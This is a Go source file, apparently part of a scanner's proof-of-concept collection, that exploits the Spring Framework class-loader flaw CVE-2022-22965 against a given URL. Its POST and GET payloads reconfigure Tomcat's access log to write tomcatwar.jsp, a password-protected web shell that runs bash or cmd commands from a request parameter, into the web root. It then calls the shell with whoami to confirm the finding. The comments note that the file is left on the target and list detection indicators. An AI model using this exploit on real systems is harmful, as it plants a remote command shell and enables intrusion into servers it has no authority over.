package poc

import (
	"fmt"
	"github.com/fatih/color"
	"ssp/common"
	"strings"
	"time"
)

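// CVE_2022_22965 probes url for the Spring Framework class-loader
// manipulation issue (CVE-2022-22965) and reports a finding through
// common.PrintVulnerabilityConfirmation when the check succeeds.
//
// This is an active, state-changing check rather than a passive fingerprint:
// the request bodies below set Tomcat access-log properties
// (prefix=tomcatwar, suffix=.jsp, directory=webapps/ROOT) so that a JSP file
// is written into the target's web root, and the final GET requests that
// file. A successful run therefore leaves an artifact (tomcatwar.jsp) on the
// target that has to be removed after testing. On the defensive side, the
// custom request headers "suffix", "c1" and "c2" together with parameters
// starting with class.module.classLoader are the observable indicators of
// this traffic.
//
// url is treated as the base URL of the target (the test path is appended to
// it verbatim). proxyURL is forwarded unchanged to common.MakeRequest and may
// be empty. The function reports by printing; on a positive result it also
// increments common.Vulnum.
func CVE_2022_22965(url string, proxyURL string) {
	headers := map[string]string{
		"User-Agent":   common.GetRandomUserAgent(),
		"suffix":       "%>//",
		"c1":           "Runtime",
		"c2":           "<%",
		"DNT":          "1",
		"Content-Type": "application/x-www-form-urlencoded",
	}

	// POST bodies for the two OS families; payloadHTTP is the query-string
	// form used for the follow-up GET.
	payloadLinux := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	payloadWin := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	payloadHTTP := "?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	getPayload := url + payloadHTTP

	for _, payload := range []string{payloadLinux, payloadWin} {
		// Send the POST via MakeRequest, honouring the caller's proxy.
		if _, _, err := common.MakeRequest(url, "POST", proxyURL, headers, payload); err != nil {
			// This path used to return silently, so a host skipped here left no
			// trace in the output; report it the same way as the GET failure below.
			color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
			return
		}
		time.Sleep(500 * time.Millisecond)
	}

	// Send the GET variant via MakeRequest, honouring the caller's proxy.
	if _, _, err := common.MakeRequest(getPayload, "GET", proxyURL, nil, ""); err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}
	time.Sleep(500 * time.Millisecond)

	// Verification step: request the file the previous requests were meant
	// to create. The same URL is reused in the confirmation message below.
	testUrl := url + "tomcatwar.jsp?pwd=j&cmd=whoami"
	resp, body, err := common.MakeRequest(testUrl, "GET", proxyURL, nil, "")
	if err != nil {
		fmt.Println("Error checking status code:", err)
		return
	}

	// Weak positive indicator: an HTTP 200 whose body contains the substring
	// "pwd" is taken as confirmation, so a page that happens to contain that
	// token can produce a false positive.
	if resp.StatusCode == 200 && strings.Contains(string(body), "pwd") {
		common.PrintVulnerabilityConfirmation("CVE_2022_22965", url, testUrl+" 空白页面多访问几次即可", "5")
		common.Vulnum++
	} else {
		color.Yellow("[-] %s 未发现CVE-2022-22965远程命令执行漏洞\n", url)
	}
}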
